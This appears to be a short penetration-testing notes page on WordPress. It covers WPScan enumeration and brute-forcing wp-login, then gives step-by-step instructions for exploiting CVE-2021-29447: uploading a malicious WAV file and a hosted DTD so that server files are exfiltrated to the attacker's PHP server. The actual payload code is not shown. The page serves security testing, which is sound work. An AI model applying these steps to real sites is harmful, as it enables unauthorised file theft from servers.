Wordpress
Generic methodologies and some CVEs
Enumeration
WPScan is the go-to tool for scanning a Wordpress application. It is also relatively important to grab an API key for it also and configure your wpscan installation to use it.
Wp-Login Brute Force
CVE-2021-29447 / Authenticated XXE & SSRF
If you have media upload rights and if your Wpscan return this vulnerability. You are in for a treat. It is possible to upload a malicious WAV
Using echo and its parameters to escape backslashes and no trail lines, use this one liner to create a malicious WAV file.
On your box, create the malicious.dtd file and prepare yourself to upload this file to the server. The content of the malicious file should be like this: replace
Use PHP to host malicious.dtd
Upload malicious.wav
As soon as you upload the malicious.wav, your php web server should request a GET request with p as the parameter. Said parameter should hold the requested server file, encoded as zlib(base64).
And then you can use php to decode it.
Last updated